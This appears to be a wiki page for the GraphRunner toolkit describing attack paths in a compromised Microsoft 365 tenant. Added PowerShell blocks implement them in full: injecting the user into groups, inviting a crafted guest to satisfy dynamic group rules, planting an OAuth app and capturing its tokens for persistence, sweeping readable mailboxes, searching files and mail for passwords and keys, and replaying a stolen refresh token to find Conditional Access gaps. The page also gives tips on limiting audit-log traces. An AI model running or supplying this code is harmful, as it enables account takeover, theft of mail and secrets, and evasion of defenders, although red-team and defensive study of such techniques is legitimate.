
Potential Attack Path Examples

Beau Bullock edited this page Oct 20, 2023 · 5 revisions

GraphRunner has a lot of different modules that each do a specific task, but combining them can open up interesting attack paths in certain scenarios. Below are a few examples of how GraphRunner can help identify situations where it can be used for persistence, privilege escalation, data harvesting, and more within a compromised M365 account.

Group-Based PrivEsc (Adding user)

  1. Identify groups that can be modified by current user (Get-UpdatableGroups)
  2. Determine current access level (Get-SharePointSites, Invoke-DumpCAPS, Check for subscription access, Invoke-GraphRecon -PermissionEnum, etc.)
  3. Inject your user into the group (Invoke-AddGroupMember)
  4. Re-run enumeration modules to see if there is new access to sites/policies.

Bonus

Guest users can be injected into groups too, but your current user (an Entra ID user in the target tenant) needs to be injected first.
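The group-based path above, as an added PowerShell example that calls Microsoft Graph directly rather than GraphRunner's own modules (this is not code from the project). It assumes a delegated Graph access token for the compromised user and that user's object id; the group selection at the end is illustrative. The authorization check uses the same estimateAccess query that tells you which groups you can update without writing anything, and the member add is the standard `$ref` POST, so the same helper adds a guest once your own user is in.

```powershell
# Added example, not GraphRunner code. Assumed inputs: a delegated Graph access token for the
# compromised user and that user's object id (normally obtained from the token / the /me endpoint).
$accessToken = '<delegated Microsoft Graph access token>'
$myObjectId  = '<object id of the current user>'
$graph   = 'https://graph.microsoft.com'
$headers = @{ Authorization = "Bearer $accessToken"; 'Content-Type' = 'application/json' }

# Page through every group in the tenant, following @odata.nextLink.
function Get-AllGroups {
    $uri = "$graph/v1.0/groups?`$select=id,displayName,securityEnabled,groupTypes&`$top=999"
    while ($uri) {
        $page = Invoke-RestMethod -Uri $uri -Headers $headers -Method Get
        $page.value
        $uri = $page.'@odata.nextLink'
    }
}

# Ask the directory whether the caller may update a group's membership. estimateAccess is a
# read-only authorization query: nothing is changed and no "Add member to group" audit event results.
function Test-GroupMemberUpdate {
    param([string]$GroupId)
    $body = @{ resourceActionAuthorizationChecks = @(
        @{ directoryScopeId = "/$GroupId"; resourceAction = 'microsoft.directory/groups/members/update' }
    ) } | ConvertTo-Json -Depth 4
    $resp = Invoke-RestMethod -Uri "$graph/beta/roleManagement/directory/estimateAccess" -Headers $headers -Method Post -Body $body
    return ($resp.value[0].accessDecision -eq 'allowed')
}

# Add any directory object (a member user or a guest) to a group by reference.
function Add-GroupMemberRef {
    param([string]$GroupId, [string]$ObjectId)
    $body = @{ '@odata.id' = "$graph/v1.0/directoryObjects/$ObjectId" } | ConvertTo-Json
    Invoke-RestMethod -Uri "$graph/v1.0/groups/$GroupId/members/`$ref" -Headers $headers -Method Post -Body $body | Out-Null
}

# Step 1: which groups can this user modify? Dynamic groups are skipped, their membership is rule-driven.
$updatable = Get-AllGroups |
    Where-Object { $_.groupTypes -notcontains 'DynamicMembership' } |
    Where-Object { Test-GroupMemberUpdate -GroupId $_.id }
$updatable | Format-Table displayName, id, securityEnabled -AutoSize

# Step 3: inject the current user into a chosen group, then re-run the access enumeration
# (Get-SharePointSites, Invoke-DumpCAPS, ...) to see what the new membership unlocks.
$target = $updatable | Where-Object displayName -like '*SharePoint*' | Select-Object -First 1   # selection is illustrative
if ($target) {
    Add-GroupMemberRef -GroupId $target.id -ObjectId $myObjectId
    "Added $myObjectId to $($target.displayName); re-run enumeration for new site/policy access"
    # Bonus: with your own user now a member, the same call with a guest's object id adds the guest.
}
```

The member add does produce a directory audit entry, so the enumeration step (which does not) is where to spend time; pick the group whose downstream effect (a Conditional Access exclusion, a SharePoint site group, an Azure RBAC assignment) you actually need before writing anything.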

Dynamic Group PrivEsc (Abusing membership rule)

  1. Identify dynamic groups (Get-DynamicGroups) whose membership rules can be abused, such as a rule that adds a user to a group when their email contains “admin”.
  2. Analyze each membership rule to determine whether you can satisfy it with an attribute you control.
    1. Example: invite a guest user to the tenant with an email address that contains “admin”; the guest is automatically added to any group whose rule matches UPNs that contain “admin”.
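An added PowerShell example (not GraphRunner's own code) of the rule analysis described above: it pulls every dynamic group's membershipRule, flags clauses a crafted guest can satisfy, and includes the Graph invitation call that turns a flagged rule into membership. It assumes a delegated Graph token for the compromised user that can read groups and create invitations; the list of guest-controlled attributes and the sample rules are constructed for the demonstration. The invitation helper is the same call the guest-persistence path further down relies on.

```powershell
# Added example, not GraphRunner code. Assumes $accessToken is a delegated Graph token that can
# read groups and create invitations (the exact rights depend on the tenant's guest-invite setting).
$accessToken = '<delegated Microsoft Graph access token>'
$graph   = 'https://graph.microsoft.com'
$headers = @{ Authorization = "Bearer $accessToken"; 'Content-Type' = 'application/json' }

# Attributes an inviter sets or influences on a guest: the invited address becomes mail/otherMails,
# the UPN is derived from it (alice_attacker.example#EXT#@tenant.onmicrosoft.com), and the display
# name is supplied in the invitation. (Assumed list; extend it for your tenant.)
$guestControlled = 'user.mail', 'user.userPrincipalName', 'user.otherMails', 'user.proxyAddresses', 'user.displayName'

function Get-DynamicGroupRules {
    $uri = "$graph/v1.0/groups?`$select=id,displayName,groupTypes,membershipRule,membershipRuleProcessingState&`$top=999"
    while ($uri) {
        $page = Invoke-RestMethod -Uri $uri -Headers $headers
        $page.value | Where-Object { $_.groupTypes -contains 'DynamicMembership' }
        $uri = $page.'@odata.nextLink'
    }
}

# Flag clauses a crafted guest can satisfy: substring/pattern operators on guest-controlled
# attributes, or an explicit userType -eq "Guest" clause. Exact -eq matches on a tenant address are not flagged.
function Find-AbusableClause {
    param([string]$Rule)
    $clause = '(?i)(user\.\w+)\s+(-contains|-match|-startsWith|-endsWith|-eq)\s+"([^"]*)"'
    foreach ($m in [regex]::Matches($Rule, $clause)) {
        $attr = $m.Groups[1].Value; $op = $m.Groups[2].Value; $val = $m.Groups[3].Value
        if ($guestControlled -contains $attr -and $op -ne '-eq') {
            [pscustomobject]@{ Attribute = $attr; Operator = $op; Value = $val; Why = 'guest-controlled attribute, non-exact match' }
        } elseif ($attr -ieq 'user.userType' -and $val -ieq 'Guest') {
            [pscustomobject]@{ Attribute = $attr; Operator = $op; Value = $val; Why = 'any invited guest qualifies' }
        }
    }
}

# Invite a guest whose address (and display name) are chosen to satisfy a flagged clause.
function Invoke-GuestInvite {
    param([string]$Email, [string]$DisplayName = $Email, [string]$RedirectUrl = 'https://myapps.microsoft.com')
    $body = @{ invitedUserEmailAddress = $Email; invitedUserDisplayName = $DisplayName
               inviteRedirectUrl = $RedirectUrl; sendInvitationMessage = $true } | ConvertTo-Json
    Invoke-RestMethod -Uri "$graph/v1.0/invitations" -Headers $headers -Method Post -Body $body
}

# Constructed sample rules (not from a real tenant) showing what the analyzer flags:
$samples = @(
    'user.mail -contains "admin"',                                                   # flagged
    '(user.department -eq "IT") and (user.userPrincipalName -startsWith "adm-")',    # flagged on the UPN clause
    'user.userType -eq "Guest"',                                                     # flagged
    'user.mail -eq "ciso@contoso.com"'                                               # not flagged: exact tenant address
)
foreach ($s in $samples) { $s; Find-AbusableClause $s | Format-Table -AutoSize }

# Live run: only rules whose processing state is On are actually evaluated by the directory.
foreach ($g in Get-DynamicGroupRules | Where-Object membershipRuleProcessingState -eq 'On') {
    $hits = Find-AbusableClause $g.membershipRule
    if ($hits) { "[$($g.displayName)] $($g.membershipRule)"; $hits | Format-Table -AutoSize }
}
# Follow-through for the first sample rule: a guest whose address contains "admin" is evaluated
# into the group the next time membership processing runs (uncomment to actually invite).
# Invoke-GuestInvite -Email 'admin.helpdesk@attacker.example'
```

Two caveats the rule text alone does not show: a guest's `mail` is populated from the invited address at invitation time, so the rule is satisfied before the invitation is even redeemed, and a rule whose processing state is Paused will never pull the guest in no matter how well the address matches.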

Watering Hole Attack via Cloned Group

  1. Identify an interesting group (SharePoint Admins, Dev groups, other IT groups, etc.)
  2. Clone it and add your own user (Invoke-SecurityGroupCloner)
  3. Wait for an admin to mistakenly add your cloned group to a policy somewhere OR come up with a ruse to get it added
  4. Monitor access to various M365 pieces like SharePoint, Teams, CAPS policies, subscriptions, etc.

Persistence via OAuth App

  1. Inject an OAuth App registration (Invoke-InjectOAuthApp) into the same tenant as the compromised user.
  2. Set up a listener to complete the OAuth flow with either Invoke-AutoOAuthFlow to catch the redirect on your localhost or the AutoOAuthFlow.py script to catch it on another server.
  3. After the user consents to the app, the flow returns tokens tied to the app registration that can be used to access M365 as that user.
  4. If the user changes their password you still have access as the app.
  5. If all of the user's sessions get killed, the app's refresh token is invalidated, but access tokens already issued to the app keep working until they expire (default is about 1 hour from issue), so there is a short window to act.
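The listener and token exchange behind steps 2 and 3, as an added PowerShell example that is not GraphRunner's Invoke-AutoOAuthFlow. It assumes an app registration already injected into the tenant with `http://localhost:10000/` as a redirect URI and a client secret (the tenant id, client id, secret and scope list below are placeholders). The block builds the consent URL, catches the authorization code on localhost with HttpListener, redeems it, and then refreshes, which is the operation that keeps working after a password change.

```powershell
# Added example, not GraphRunner code. Placeholders: the app registration is assumed to exist
# already (see Invoke-InjectOAuthApp) with this redirect URI registered and a client secret created.
$tenantId     = '<tenant id, or common>'
$clientId     = '<application (client) id of the injected app>'
$clientSecret = '<client secret created on the app>'
$redirectUri  = 'http://localhost:10000/'
# offline_access is what makes the token endpoint return a refresh token; .default requests
# every delegated Graph permission configured on the app.
$scope        = 'openid offline_access https://graph.microsoft.com/.default'

# 1. Build the consent URL the compromised user must open (or be phished into opening).
$authUrl = "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/authorize?" +
           "client_id=$clientId&response_type=code&response_mode=query" +
           "&redirect_uri=$([uri]::EscapeDataString($redirectUri))" +
           "&scope=$([uri]::EscapeDataString($scope))&state=graphrunner"
Write-Host "Open in the victim's session: $authUrl"

# 2. Catch the redirect on localhost and pull the authorization code out of the query string.
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add($redirectUri)
$listener.Start()
$ctx  = $listener.GetContext()                      # blocks until the browser hits the redirect URI
$code = $ctx.Request.QueryString['code']
$bytes = [Text.Encoding]::UTF8.GetBytes('<html><body>Done, you can close this tab.</body></html>')
$ctx.Response.OutputStream.Write($bytes, 0, $bytes.Length)
$ctx.Response.Close()
$listener.Stop()

# 3. Redeem the code. The refresh token is the persistence artifact; the access token expires in ~1h.
$tokenUrl = "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token"
$tokens = Invoke-RestMethod -Method Post -Uri $tokenUrl -ContentType 'application/x-www-form-urlencoded' -Body @{
    grant_type = 'authorization_code'; client_id = $clientId; client_secret = $clientSecret
    code = $code; redirect_uri = $redirectUri; scope = $scope
}
Write-Host "access_token valid for $($tokens.expires_in)s; refresh_token received: $([bool]$tokens.refresh_token)"

# 4. Act as the user through the app, and rotate the tokens when the access token expires.
#    Because the app is a confidential client (it has a secret), a user password change does not
#    revoke this refresh token; a sign-in session revocation or deleting the app does.
function Update-AppTokens {
    param([string]$RefreshToken)
    Invoke-RestMethod -Method Post -Uri $tokenUrl -ContentType 'application/x-www-form-urlencoded' -Body @{
        grant_type = 'refresh_token'; client_id = $clientId; client_secret = $clientSecret
        refresh_token = $RefreshToken; scope = $scope
    }
}
$me = Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/me' -Headers @{ Authorization = "Bearer $($tokens.access_token)" }
"Acting as $($me.userPrincipalName) through app $clientId"
$tokens = Update-AppTokens -RefreshToken $tokens.refresh_token   # store the new refresh_token; the old one may be retired
```

Each refresh can hand back a new refresh token, so persist the latest one rather than the original. Remember that the consent itself is logged as a user consent event and the app shows up under the user's consented applications, which is where an incident responder will find it.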

Persistence to SharePoint/OneDrive Files via Guest User access

If external sharing for a site is set to allow “Anyone” or “New and existing guests” access via external sharing then it may be possible to leverage a guest account for long term access to specific files.


  1. Invite guest user to tenant (Invoke-InviteGuest).
  2. Gather SharePoint share links and maintain long term access to files until guest user is removed.

Internal Phishing via OAuth App

  1. Inject an OAuth app (Invoke-InjectOAuthApp) that has limited permissions (Mail.Read) into the same tenant as the compromised user.
  2. Use it to perform illicit consent grant phishing attacks internally for more access.

Find Other Mailboxes You Can Read

  1. Deploy an app with the “Mail.Read.Shared” scope into the victim tenant and consent to it with your user, or consent to this permission on the Graph Explorer and leverage the app token with GraphRunner.
  2. Use Invoke-GraphOpenInboxFinder to find other mailboxes that have been shared with you.
  3. Use Get-Inbox to pull the latest messages from other inboxes you can read.
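The mailbox sweep from steps 2 and 3, as an added PowerShell example that is not GraphRunner's Invoke-GraphOpenInboxFinder. It assumes an access token carrying Mail.Read.Shared (obtained through the injected app or Graph Explorer as the text describes). Graph answers a shared-mailbox read with 403 ErrorAccessDenied when nothing has been delegated to you, so the approach is simply to try each mailbox and keep the ones that return messages.

```powershell
# Added example, not GraphRunner code. Assumes $accessToken was issued with the Mail.Read.Shared
# delegated scope to the compromised user.
$accessToken = '<Graph access token carrying Mail.Read.Shared>'
$graph   = 'https://graph.microsoft.com'
$headers = @{ Authorization = "Bearer $accessToken" }

# Every user with a mail attribute is a candidate mailbox; page through the directory.
function Get-MailboxCandidates {
    $uri = "$graph/v1.0/users?`$select=userPrincipalName,mail&`$top=999"
    while ($uri) {
        $page = Invoke-RestMethod -Uri $uri -Headers $headers
        $page.value | Where-Object { $_.mail } | ForEach-Object { $_.userPrincipalName }
        $uri = $page.'@odata.nextLink'
    }
}

# Mail.Read.Shared only reaches mailboxes/folders delegated to the caller; anything else is a 403.
# 404 means the account has no Exchange mailbox at all, 429 means slow down.
function Test-InboxReadable {
    param([string]$Upn)
    $uri = "$graph/v1.0/users/$Upn/mailFolders/inbox/messages?`$top=1&`$select=subject,receivedDateTime"
    try {
        $r = Invoke-RestMethod -Uri $uri -Headers $headers
        [pscustomobject]@{ Mailbox = $Upn; Readable = $true; LatestSubject = $r.value[0].subject; Received = $r.value[0].receivedDateTime }
    } catch {
        $status = $_.Exception.Response.StatusCode.value__
        if ($status -eq 429) { Start-Sleep -Seconds 10; return Test-InboxReadable -Upn $Upn }
        if ($status -ne 403 -and $status -ne 404) { Write-Warning "$Upn : HTTP $status" }
        [pscustomobject]@{ Mailbox = $Upn; Readable = $false; LatestSubject = $null; Received = $null }
    }
}

# Pull the newest messages from a mailbox that turned out to be readable (what Get-Inbox does).
function Get-InboxMessages {
    param([string]$Upn, [int]$Count = 25)
    $uri = "$graph/v1.0/users/$Upn/mailFolders/inbox/messages?`$top=$Count&`$orderby=receivedDateTime desc&`$select=subject,from,receivedDateTime,bodyPreview"
    (Invoke-RestMethod -Uri $uri -Headers $headers).value
}

$readable = Get-MailboxCandidates | ForEach-Object { Test-InboxReadable -Upn $_ } | Where-Object Readable
$readable | Format-Table Mailbox, LatestSubject, Received -AutoSize
foreach ($m in $readable) { Get-InboxMessages -Upn $m.Mailbox | Format-Table receivedDateTime, subject -AutoSize }
```

One probe per mailbox against a large tenant is noisy in Exchange mailbox audit logs (each hit is a MailItemsAccessed event as the caller), so scope the candidate list to the users or shared mailboxes that matter rather than sweeping the whole directory.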

Pillage SharePoint, Teams, and Email

  1. Leverage the pillage modules to identify sensitive data sent in email (Invoke-SearchMailbox, Get-Inbox), Teams chat (Invoke-SearchTeams, Get-TeamsChat) or SharePoint (Invoke-SearchSharePointAndOneDrive).
  2. Use the following command to perform “Snaffler-like” scanning of a SharePoint site:
    1. Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams
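An added PowerShell example (not GraphRunner's pillage modules) of the "Snaffler-like" sweep in step 2, using the Microsoft Graph search API against both files and mail with one term list. It assumes a delegated token for the compromised user with read access to files and mail; the term list is constructed here and the search only returns content that user can already reach, which is why the group-injection paths earlier widen what this finds.

```powershell
# Added example, not GraphRunner code. Assumes a delegated Graph token for the compromised user
# with file/site read (for driveItem hits) and mail read (for message hits).
$accessToken = '<delegated Microsoft Graph access token>'
$graph   = 'https://graph.microsoft.com'
$headers = @{ Authorization = "Bearer $accessToken"; 'Content-Type' = 'application/json' }

# Snaffler-style term list (constructed; extend it for the engagement).
$terms = 'password', 'passwd', 'secret', 'api key', 'connectionstring', 'BEGIN RSA PRIVATE KEY', 'ssn'

# Page through Graph search hits for one entity type. Files and messages cannot share a
# request, so the caller runs one search per type.
function Search-GraphContent {
    param(
        [string]$Query,
        [ValidateSet('driveItem', 'message')][string]$EntityType,
        [int]$PageSize = 25
    )
    $from = 0
    do {
        $body = @{ requests = @(@{
            entityTypes = @($EntityType)
            query       = @{ queryString = $Query }
            from        = $from
            size        = $PageSize
        }) } | ConvertTo-Json -Depth 6
        $resp = Invoke-RestMethod -Uri "$graph/v1.0/search/query" -Headers $headers -Method Post -Body $body
        $container = $resp.value[0].hitsContainers[0]
        foreach ($hit in $container.hits) { $hit }
        $from += $PageSize
    } while ($container.moreResultsAvailable)
}

# Normalize file and mail hits into one shape so results can be sorted and exported together.
function Find-SensitiveContent {
    param([string[]]$Terms)
    foreach ($t in $Terms) {
        $q = '"' + $t + '"'   # quoted so multi-word terms match as a phrase
        Search-GraphContent -Query $q -EntityType driveItem | ForEach-Object {
            [pscustomobject]@{ Term = $t; Kind = 'file'; Name = $_.resource.name
                               Where = $_.resource.webUrl; Modified = $_.resource.lastModifiedDateTime }
        }
        Search-GraphContent -Query $q -EntityType message | ForEach-Object {
            [pscustomobject]@{ Term = $t; Kind = 'mail'; Name = $_.resource.subject
                               Where = $_.resource.webLink; Modified = $_.resource.receivedDateTime }
        }
    }
}

$hits = Find-SensitiveContent -Terms $terms
$hits | Sort-Object Modified -Descending | Format-Table Term, Kind, Name, Where -AutoSize
$hits | Export-Csv -NoTypeInformation -Path .\pillage-hits.csv
```

Search indexes content, not just file names, so a spreadsheet called `budget.xlsx` that contains a "password" column turns up too; download candidates with the file's `@microsoft.graph.downloadUrl` (or the immersive-reader route below where downloads are blocked) before drawing conclusions from a subject line.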

Search User Attributes

  1. Leverage the Invoke-SearchUserAttributes module to identify potentially sensitive information in Entra ID user attributes.

Immersive File Reader

  1. Use Invoke-SearchSharePointAndOneDrive to identify interesting files
  2. Use Invoke-ImmersiveFileReader to download them in some environments that block file downloads from SharePoint and OneDrive.

Find CAP Bypasses and Enumerate Permission Scopes Using Different Client IDs

  1. Gather a refresh token from an authenticated session (e.g., intercepted from the browser).
  2. Use it with the Invoke-BruteClientIDAccess module to find which client application IDs the token can be refreshed into, along with the permission scopes each one is granted; a client that succeeds where others are blocked points at a gap in the Conditional Access policies.
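The refresh-token replay behind step 2, as an added PowerShell example that is not GraphRunner's Invoke-BruteClientIDAccess. A refresh token issued to one Microsoft first-party client can be redeemed by other clients in the same family, and each client gets its own scope set and its own Conditional Access evaluation. The block assumes a captured refresh token; the client-id table is a constructed sample of well-known first-party applications to extend, and the scopes are read straight out of the `scp` claim of each access token that comes back.

```powershell
# Added example, not GraphRunner code. $refreshToken is assumed to be captured from the victim's
# authenticated session; the client-id table is a constructed sample, not an exhaustive list.
$refreshToken = '<refresh token captured from an authenticated session>'
$tenant       = 'common'
$clientIds = [ordered]@{
    'Microsoft Office'        = 'd3590ed6-52b3-4102-aeff-aad2292ab01c'
    'Microsoft Teams'         = '1fec8e78-bce4-4aaf-ab1b-5451cc387264'
    'Azure CLI'               = '04b07795-8ddb-461a-bbee-02f9e1bf7b46'
    'Azure PowerShell'        = '1950a258-227b-4e31-a9cf-717495945fc2'
    'Microsoft Authenticator' = '4813382a-8fa7-425e-ab75-3b753aab3abb'
    'Outlook Mobile'          = '27922004-5251-4030-b22d-91ecd9a37ea4'
}

# Decode the JWT payload (base64url, padding restored) to read claims such as scp and appid.
function ConvertFrom-JwtPayload {
    param([string]$Jwt)
    $payload = $Jwt.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}

# Try to refresh into one client id for a given resource and report the scopes it was granted.
function Test-ClientIdRefresh {
    param([string]$Name, [string]$ClientId, [string]$Resource = 'https://graph.microsoft.com')
    try {
        $r = Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/$tenant/oauth2/token" `
             -ContentType 'application/x-www-form-urlencoded' -Body @{
                 grant_type = 'refresh_token'; client_id = $ClientId; refresh_token = $refreshToken; resource = $Resource
             }
        $claims = ConvertFrom-JwtPayload $r.access_token
        [pscustomobject]@{ App = $Name; ClientId = $ClientId; Ok = $true; Scopes = $claims.scp; Error = $null }
    } catch {
        # invalid_grant: the token is not usable by this client at all.
        # interaction_required / AADSTS5300x: the client is valid but a Conditional Access policy blocked it,
        # which is exactly the signal that the clients that DID succeed are outside that policy's scope.
        $err = $_.Exception.Message
        if ($_.ErrorDetails.Message) {
            try { $err = ($_.ErrorDetails.Message | ConvertFrom-Json).error_description.Split("`n")[0] } catch { }
        }
        [pscustomobject]@{ App = $Name; ClientId = $ClientId; Ok = $false; Scopes = $null; Error = $err }
    }
}

$results = foreach ($name in $clientIds.Keys) { Test-ClientIdRefresh -Name $name -ClientId $clientIds[$name] }
$results | Format-Table App, Ok, Scopes, Error -Wrap -AutoSize

# The same loop against another resource shows which clients can reach it; e.g. Azure Resource Manager:
# $clientIds.GetEnumerator() | ForEach-Object { Test-ClientIdRefresh -Name $_.Key -ClientId $_.Value -Resource 'https://management.azure.com' }
```

Read the failures as carefully as the successes: a refresh that fails with a Conditional Access error for Azure CLI but succeeds for Microsoft Office means the policy was written against a specific client app rather than "all cloud apps", and the successful client's scopes are what you have to work with.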